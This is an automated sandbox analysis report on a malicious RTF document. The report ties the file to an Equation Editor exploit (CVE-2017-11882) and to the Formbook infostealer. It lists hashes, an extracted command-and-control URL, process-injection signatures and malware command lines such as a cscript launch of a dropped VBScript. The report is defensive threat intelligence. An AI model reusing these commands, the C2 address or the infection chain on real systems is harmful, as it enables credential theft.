Analysis
-
max time kernel
151s
-
max time network
92s
-
platform
windows7_x64
-
resource
win7v20201028
-
submitted
18-01-2021 13:43
Static task
static1
Behavioral task
behavioral1
Sample
RFQ TK011821.doc.rtf
Resource
win7v20201028
Behavioral task
behavioral2
Sample
RFQ TK011821.doc.rtf
Resource
win10v20201028
General
-
Target
RFQ TK011821.doc.rtf
-
Size
1.5MB
-
MD5
ec733578c8fccf0e3930ddcb2b337228
-
SHA1
df8b20801a5ee07f8de71679bb434c94858b0f9e
-
SHA256
ef25940acecd4fd916e53386f63b8fb69102f2f13e2b7b9e89f64775da9afa08
-
SHA512
2af97e61aa4b3efbf1e1027f7a937130bf2e31ef21f123beff209dd72a0adbad3d1da6e8244e5ffffc3838c3439d4aa2492498866b4a5d9ba87cfd4d1cda3a59
Malware Config
Extracted
formbook
http://www.sob.xyz/p7v/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exe
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1736 | 428 | Powershell.exe |
-
Formbook Payload 3 IoCs
Processes:
resource | yara_rule
behavioral1/memory/596-24-0x0000000000400000-0x000000000042E000-memory.dmp | formbook
behavioral1/memory/596-25-0x000000000041EA90-mapping.dmp | formbook
behavioral1/memory/1592-35-0x00000000000E0000-0x000000000010E000-memory.dmp | formbook
-
Blocklisted process makes network request 4 IoCs
Processes:
Powershell.exe
flow | pid | process
8 | 1736 | Powershell.exe
10 | 1736 | Powershell.exe
12 | 1736 | Powershell.exe
14 | 1736 | Powershell.exe
-
Drops file in System32 directory 1 IoCs
Processes:
Powershell.exe
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | Powershell.exe
-
Suspicious use of SetThreadContext 3 IoCs
Processes:
Powershell.exe, notepad.exe, explorer.exe
description | pid | process | target process
PID 1736 set thread context of 596 | 1736 | Powershell.exe | notepad.exe
PID 596 set thread context of 1236 | 596 | notepad.exe | Explorer.EXE
PID 1592 set thread context of 1236 | 1592 | explorer.exe | Explorer.EXE
-
Drops file in Windows directory 1 IoCs
Processes:
WINWORD.EXE
description | ioc | process
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
WINWORD.EXE
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
Key created | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXE
pid | process
1652 | WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
Powershell.exenotepad.exeexplorer.exepid process 1736 Powershell.exe 1736 Powershell.exe 1736 Powershell.exe 1736 Powershell.exe 1736 Powershell.exe 1736 Powershell.exe 1736 Powershell.exe 1736 Powershell.exe 596 notepad.exe 596 notepad.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe 1592 explorer.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
notepad.exe, explorer.exe
pid | process
596 | notepad.exe
596 | notepad.exe
596 | notepad.exe
1592 | explorer.exe
1592 | explorer.exe
-
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
Powershell.exe, notepad.exe, explorer.exe
description | pid | process
Token: SeDebugPrivilege | 1736 | Powershell.exe
Token: SeIncreaseQuotaPrivilege | 1736 | Powershell.exe
Token: SeSecurityPrivilege | 1736 | Powershell.exe
Token: SeTakeOwnershipPrivilege | 1736 | Powershell.exe
Token: SeLoadDriverPrivilege | 1736 | Powershell.exe
Token: SeSystemProfilePrivilege | 1736 | Powershell.exe
Token: SeSystemtimePrivilege | 1736 | Powershell.exe
Token: SeProfSingleProcessPrivilege | 1736 | Powershell.exe
Token: SeIncBasePriorityPrivilege | 1736 | Powershell.exe
Token: SeCreatePagefilePrivilege | 1736 | Powershell.exe
Token: SeBackupPrivilege | 1736 | Powershell.exe
Token: SeRestorePrivilege | 1736 | Powershell.exe
Token: SeShutdownPrivilege | 1736 | Powershell.exe
Token: SeDebugPrivilege | 1736 | Powershell.exe
Token: SeSystemEnvironmentPrivilege | 1736 | Powershell.exe
Token: SeRemoteShutdownPrivilege | 1736 | Powershell.exe
Token: SeUndockPrivilege | 1736 | Powershell.exe
Token: SeManageVolumePrivilege | 1736 | Powershell.exe
Token: 33 | 1736 | Powershell.exe
Token: 34 | 1736 | Powershell.exe
Token: 35 | 1736 | Powershell.exe
Token: SeIncreaseQuotaPrivilege | 1736 | Powershell.exe
Token: SeSecurityPrivilege | 1736 | Powershell.exe
Token: SeTakeOwnershipPrivilege | 1736 | Powershell.exe
Token: SeLoadDriverPrivilege | 1736 | Powershell.exe
Token: SeSystemProfilePrivilege | 1736 | Powershell.exe
Token: SeSystemtimePrivilege | 1736 | Powershell.exe
Token: SeProfSingleProcessPrivilege | 1736 | Powershell.exe
Token: SeIncBasePriorityPrivilege | 1736 | Powershell.exe
Token: SeCreatePagefilePrivilege | 1736 | Powershell.exe
Token: SeBackupPrivilege | 1736 | Powershell.exe
Token: SeRestorePrivilege | 1736 | Powershell.exe
Token: SeShutdownPrivilege | 1736 | Powershell.exe
Token: SeDebugPrivilege | 1736 | Powershell.exe
Token: SeSystemEnvironmentPrivilege | 1736 | Powershell.exe
Token: SeRemoteShutdownPrivilege | 1736 | Powershell.exe
Token: SeUndockPrivilege | 1736 | Powershell.exe
Token: SeManageVolumePrivilege | 1736 | Powershell.exe
Token: 33 | 1736 | Powershell.exe
Token: 34 | 1736 | Powershell.exe
Token: 35 | 1736 | Powershell.exe
Token: SeDebugPrivilege | 596 | notepad.exe
Token: SeDebugPrivilege | 1592 | explorer.exe
-
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
Explorer.EXE
pid | process
1236 | Explorer.EXE
1236 | Explorer.EXE
1236 | Explorer.EXE
1236 | Explorer.EXE
-
Suspicious use of SendNotifyMessage 4 IoCs
Processes:
Explorer.EXE
pid | process
1236 | Explorer.EXE
1236 | Explorer.EXE
1236 | Explorer.EXE
1236 | Explorer.EXE
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
WINWORD.EXE
pid | process
1652 | WINWORD.EXE
1652 | WINWORD.EXE
-
Suspicious use of WriteProcessMemory 23 IoCs
Processes:
EQNEDT32.EXE, CmD.exe, Powershell.exe, Explorer.EXE, explorer.exe
description | pid | process | target process
PID 1676 wrote to memory of 652 | 1676 | EQNEDT32.EXE | CmD.exe
PID 1676 wrote to memory of 652 | 1676 | EQNEDT32.EXE | CmD.exe
PID 1676 wrote to memory of 652 | 1676 | EQNEDT32.EXE | CmD.exe
PID 1676 wrote to memory of 652 | 1676 | EQNEDT32.EXE | CmD.exe
PID 652 wrote to memory of 860 | 652 | CmD.exe | cscript.exe
PID 652 wrote to memory of 860 | 652 | CmD.exe | cscript.exe
PID 652 wrote to memory of 860 | 652 | CmD.exe | cscript.exe
PID 652 wrote to memory of 860 | 652 | CmD.exe | cscript.exe
PID 1736 wrote to memory of 596 | 1736 | Powershell.exe | notepad.exe
PID 1736 wrote to memory of 596 | 1736 | Powershell.exe | notepad.exe
PID 1736 wrote to memory of 596 | 1736 | Powershell.exe | notepad.exe
PID 1736 wrote to memory of 596 | 1736 | Powershell.exe | notepad.exe
PID 1736 wrote to memory of 596 | 1736 | Powershell.exe | notepad.exe
PID 1736 wrote to memory of 596 | 1736 | Powershell.exe | notepad.exe
PID 1736 wrote to memory of 596 | 1736 | Powershell.exe | notepad.exe
PID 1236 wrote to memory of 1592 | 1236 | Explorer.EXE | explorer.exe
PID 1236 wrote to memory of 1592 | 1236 | Explorer.EXE | explorer.exe
PID 1236 wrote to memory of 1592 | 1236 | Explorer.EXE | explorer.exe
PID 1236 wrote to memory of 1592 | 1236 | Explorer.EXE | explorer.exe
PID 1592 wrote to memory of 516 | 1592 | explorer.exe | cmd.exe
PID 1592 wrote to memory of 516 | 1592 | explorer.exe | cmd.exe
PID 1592 wrote to memory of 516 | 1592 | explorer.exe | cmd.exe
PID 1592 wrote to memory of 516 | 1592 | explorer.exe | cmd.exe
Processes
-
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE 1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\RFQ TK011821.doc.rtf" 2⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\SysWOW64\explorer.exe" 2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe
/c del "C:\WINDOWS\syswow64\notepad.exe" 3⤵
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding 1⤵
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\CmD.exe
CmD.exe /C cscript %tmp%\Client.vbs AC 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp\Client.vbs AC 3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe 1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\syswow64\notepad.exe
"{path}" 2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Client.vbs
MD5
344890eb067576658d5008e5b05f257b
SHA1
55d4eb42fc6e68578226558ad2a33f86f99c3d9d
SHA256
10f3df1ad88944665aecb7a7a3c23a7789af0b8a1a329c964f374f2bc879f7e8
SHA512
029bd05a91f88d4d32b14dd6d3994636af2ee909c9bb15ec5118125f323470a05d5ce8ec78264bc8c4f3f75efb4765ccf72424159aa31b5667d5ad8f649ecb74